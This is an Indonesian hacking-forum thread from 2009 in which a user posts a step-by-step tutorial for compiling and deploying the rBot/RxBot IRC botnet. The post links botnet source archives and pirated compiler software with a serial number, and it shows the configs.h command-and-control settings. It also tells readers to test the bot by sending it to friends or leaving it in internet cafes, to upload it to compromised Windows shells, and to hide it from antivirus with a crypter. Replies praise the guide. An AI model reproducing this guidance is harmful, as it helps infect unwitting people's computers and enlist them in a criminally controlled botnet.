Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

Tutor how to compile, secure, + run botnet

[ Facebook comments]

Forum untuk membahas hacking secara umum

Moderators: Paman, Xshadow, indounderground

Tutor how to compile, secure, + run botnet

Postby tey » Tue Aug 04, 2009 4:45 pm

Hallo semua,,,, :malumalu:

disini saya bakal share bagaimana cara mengcomplie,secure, dan menjalankan botnet.

buat para master yang udah tau silahkan nonton, ato kalo tutor ini gak bermutu silahkan delete aja :devil

Apa itu botnet??

J : Botnet adalah suatu jargon memasukkan robot-robot perangkat lunak, atau bots, yang dijalankan secara otonomi dan secara otomatis. Mereka bekeja sebagai Zombie yang disusupkan pada jaringan komputer menggunakan perangkat lunak yang bisa dijalankan dimonitor dan diperintahkan bereaksi oleh pembuatnya (Master refer).

Botnet merupakan kegiatan menyusupkan program-program tertentu kepada server-server komputer dimana program-program tersebut biasanya disusupkan sebagai worms, Trojan horse, atau backdoors, di bawah perintah Master Refer dan dikendalikan dengan sebuah remote. Sehingga program tersebut dapat bekerja kapan saja sesuai keinginan si Master tadi yang tujuannya untuk mengganggu ataupun merusak suatu jaringan atau system operasi komputer (kejahatan) yang berpotensi melumpuhkan jaringan internet secara luas. Yang lebih mengerikan lagi sekarang ini botnet dapat digerakan dan dikendalikan oleh si Master dari tempat manapun dan kapanpun ia mau, jadi seperti zombie yang dipasang pada server-server yang ditanam melalui malware.

Program-program botnet tersebut menyebar ketika IRC “bots”. Diperintahkan dan kendali berlangsung via satu server IRC atau suatu saluran yang spesifik di suatu jaringan publik. untuk selengkapnya kawan2 bisa googling :)


OK kita mulai!!

I. Setting C++ Compilier

1. Download Microsoft Visual C++ 6.0 Standard Edition

Code: Select all
http://rapidshare.com/files/21861555/msc__.rar

Code: Select all
(pass : itzforblitz)
      (serial : 812-2224558)


2. Jalankan Setup.exe dan install, jgn lupa masukin serial number nya :)

3. Trus Download dan install Service Pack 6 for Visual Basic 6.0, Visual C++ 6.0 with Visual Source Safe 6.0d

Code: Select all
http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en



4. Jika sudah download dan install Service Pack 6, download Windows SDK

Code: Select all
http://rapidshare.com/files/263521584/sdk.rar


5. ok selesai,, masuk tahap 2, lanjutkan!!!!

II. Configurasi Compilier C++


1. Jalankan Microsoft Visual C++ Compilier 6.0

2. masuk ke Tools > Options dan klik "Directories" tab

3. sekarang double klik di baris kosong, kemudian browse ke directori SDK yang sudah kita instal sebelumnya

dan add path :

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
Image



III. setting BOTNET

1. Download Source code botnet

Code: Select all
http://rapidshare.com/files/263526303/botsrc7.6rx.rar


2. Sesudah download, extract file botnet ( nah lho banyak file nya kan?? heheh,,)

3. cari file "configs.h" dan buka pake notepad

4. terus cari bagian ini neh

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "server.irc.botnet"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (gak terlalu dibutuhin)
char channel[] = "#botz_channel"; // channel buat botnet join
char chanpass[] = "My_channel_pass"; // channel password

OPTIONAL
-------
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass



IV. okey,, tahap akhir neh Building ur BOTNET

1. buka dan jalankan Microsoft Visual C++

2. Pilih "File > Open Workspace"

3. Browse ke folder Rxbot 7.6 kamu kemudian pilih file "rBot.dsw" trus open

4. Klik kanan "rBot Files" dan klik Build:
Image

5. hufh...selesai..botnet jadi :usap: ,,

6. rBot.exe akan tersimpan di folder debug!

owh iya apabila pada saat mengcomplie ada error,, silahkan cek lagi dengan seksama setting botnet anda.

Terus bagaimana cara ngetes nya?? hehehe kirm aja rbot.exe ke teman anda atau simpan di warnet2 terdekat xiixixi

bisa juga klo kamu punya shells windows,,upload aja terus jalanin botnet nya,,

kemudian jalanin MIRC dan masuk ke channel yang udah di setting buat botnet,, ada join gak bot na xixixi :devil

eh iya tambahan neh,, supaya rbot.exe gak terdeteksi AV bisa mengunakan FUD encrypter, banyak lah di google :pisau:


# untuk commandlist rbot.exe nya download disini :

Code: Select all
http://rapidshare.com/files/263538389/cmands.html


# kalo mau source code botnet2 yang lain silahkan download

Code: Select all
http://rapidshare.com/files/263550523/BNSources.rar



enjoy :malumalu: :tidur:
Last edited by tey on Tue Dec 15, 2009 12:50 am, edited 2 times in total.
i am not detractor person..like u :)
be a good boy..
User avatar
tey
 
Posts: 68
Joined: Tue May 01, 2007 11:30 am
Location: heaven

Re: How to compile, secure, + run botnet

Postby abit doang » Tue Aug 04, 2009 5:23 pm

No pertam*x..
Waw, ini dia yg gw tung9u2.. Dri kmaren nemu tutor'y bahasa orang bule mulu, jdi kurang <i>dong</i> hehe.. Keep share bro.. Its damn good.. :D
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/
User avatar
abit doang
 
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../

Re: How to compile, secure, + run botnet

Postby hut4ga00l_x^killer » Tue Aug 04, 2009 6:39 pm

wew thaks bro tutornya tapi yg untuk server linux ada gak ya bro :mrgreen:
hut4ga00l_x^killer
 
Posts: 5
Joined: Sat Jul 11, 2009 5:00 pm

Re: How to compile, secure, + run botnet

Postby tey » Tue Aug 04, 2009 7:01 pm

hut4ga00l_x^killer wrote:wew thaks bro tutornya tapi yg untuk server linux ada gak ya bro :mrgreen:


lha emang lu gak punya tutor na newbie?? dlu pernah posting soal yang "kambe" itu,,,nah itu kan bot nya buat di linux :)
i am not detractor person..like u :)
be a good boy..
User avatar
tey
 
Posts: 68
Joined: Tue May 01, 2007 11:30 am
Location: heaven

Re: How to compile, secure, + run botnet

Postby shad.hckr » Wed Aug 05, 2009 12:50 am

yang punya newbie ada diforum lama.. sekarang dah ilang kk..
thanks kk tey.. :x
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: How to compile, secure, + run botnet

Postby gblack » Wed Aug 05, 2009 7:22 am

Yea a good translation ma bro... But you had post this in wrong section.. Will move this as im online on computer later... Bcoz i like to move it ... Move it.. :lol:

Warning! You can fukt the world if you could understand about botnets!

Cya next time with my own tutorial... But u must try to understand this tutorial b4 u follow me... ;)

gbLaCk-

Down doesn't mean die.

I will never die,
gbLaCk-

User avatar
gblack
 
Posts: 61
Joined: Tue Jan 30, 2007 8:12 pm
Location: /r00tb0x

Re: How to compile, secure, + run botnet

Postby shad.hckr » Wed Aug 05, 2009 11:17 am

wew.. ditunggu om.. :D moga aja pesangon buat 17an nya gedhe :p
User avatar
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: How to compile, secure, + run botnet

Postby tey » Wed Aug 05, 2009 12:12 pm

Yea a good translation ma bro... But you had post this in wrong section.. Will move this as im online on computer later... Bcoz i like to move it ... Move it.. :lol:


Ops salah kamar y?? :oops:
di pindah aja bro xixixiixi :mrgreen:

Warning! You can fukt the world if you could understand about botnets!


yeah,,,, :twisted:


Cya next time with my own tutorial... But u must try to understand this tutorial b4 u follow me... ;)

gbLaCk-

wow okay man am waiting,, :)
i am not detractor person..like u :)
be a good boy..
User avatar
tey
 
Posts: 68
Joined: Tue May 01, 2007 11:30 am
Location: heaven

Re: How to compile, secure, + run botnet

Postby Santet » Wed Aug 05, 2009 1:49 pm

keren pertamax :D
User avatar
Santet
 
Posts: 46
Joined: Sat Mar 28, 2009 7:09 pm

Re: How to compile, secure, + run botnet

Postby python » Sat Aug 15, 2009 2:23 am

botnet bukannya memanfaatkan resource pihak ke -3 ?
benar / betul ? :mrgreen:
Sistem operasi, bahasa pemrograman, software dan teknologi hanyalah sebuah tool (alat) yang harus kita kuasai dan gunakan untuk memecahkan masalah. Ketergantungan terhadap sebuah tool adalah kebodohan. - romisatriawahono -

Email : [email protected]
python
 
Posts: 33
Joined: Sat May 16, 2009 10:49 am

leave a comment

Next

Return to Hacking Umum

Who is online

Users browsing this forum: No registered users and 3 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id